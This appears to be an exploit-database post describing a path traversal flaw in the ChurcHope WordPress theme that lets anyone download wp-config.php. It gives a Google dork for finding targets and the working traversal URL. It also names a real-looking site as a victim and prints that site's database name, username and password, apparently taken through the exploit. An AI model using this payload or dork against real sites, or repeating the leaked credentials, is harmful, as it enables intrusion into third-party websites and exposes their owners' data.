WordPress 4.7.13 ChurcHope Themes 4.7.x DB Config File

1. ############################################################################################
2.  
3. # Exploit Title : WordPress 4.7.13 ChurcHope Responsive Themes 4.7.x Database Configuration File Download
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 20/03/2019
7. # Vendor Homepage : themeforest.net
8. # Software Information Link : themeforest.net/item/churchope-responsive-wordpress-theme/2708562
9. # Software Affected Versions : WordPress 4.x - 4.7.13 - Software 4.7.x
10. # Tested On : Windows and Linux
11. # Category : WebApps
12. # Exploit Risk : Medium
13. # Google Dorks : inurl:/wp-content/themes/churchope/
14. # Vulnerability Type :
15. CWE-16 [ Configuration ]
16. CWE-200 [ Information Exposure ]
17. CWE-23 [ Relative Path Traversal ]
18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
21.  
22. ############################################################################################
23.  
24. # Impact :
25. ***********
26. * WordPress 4.x ChurcHope Responsive Themes 4.7.x is prone to a vulnerability that lets attackers download database config file because
27.  
28. the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files
29.  
30. within the context of the web server process and obtain potentially sensitive informations.
31.  
32. * An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized
33.  
34. to have access to that information. * The software has Relative Path Traversal vulnerability and it uses external input to construct
35.  
36. a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve
37.  
38. to a location that is outside of that directory.
39.  
40. ############################################################################################
41.  
42. # Vulnerable File :
43. ****************
44. /downloadlink.php
45.  
46. # Vulnerable Parameter :
47. **********************
48. ?file=
49.  
50. # Database Configuration File Download Exploit :
51. ********************************************
52. /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
53.  
54. Informations About MySQL Database Configuration File =>
55. ****************************************************
56. ** The name of the database for WordPress */
57. define('DB_NAME', '');
58.  
59. /** MySQL database username */
60. define('DB_USER', '');
61.  
62. /** MySQL database password */
63. define('DB_PASSWORD', '');
64.  
65. /** MySQL hostname */
66. define('DB_HOST', '');
67.  
68. ############################################################################################
69.  
70. # Example Vulnerable Sites :
71. *************************
72. [+] alexanderfaranpojo.com/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
73.  
74. ** The name of the database for WordPress
75. */
76. define('DB_NAME', 'alexand3_wpAFM');
77.  
78. /
79. ** MySQL database username
80. */
81. define('DB_USER', 'alexand3_wpAFM');
82.  
83. /
84. ** MySQL database password
85. */
86. define('DB_PASSWORD', 'c8Se4dP7fr');
87.  
88. /
89. ** MySQL hostname
90. */
91. define('DB_HOST', 'localhost');
92.  
93. /
94. ** Database Charset to use in creating database tables.
95. */
96. define('DB_CHARSET', 'utf8');
97.  
98. /**
99.  
100. ############################################################################################
101.  
102. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
103.  
104. ############################################################################################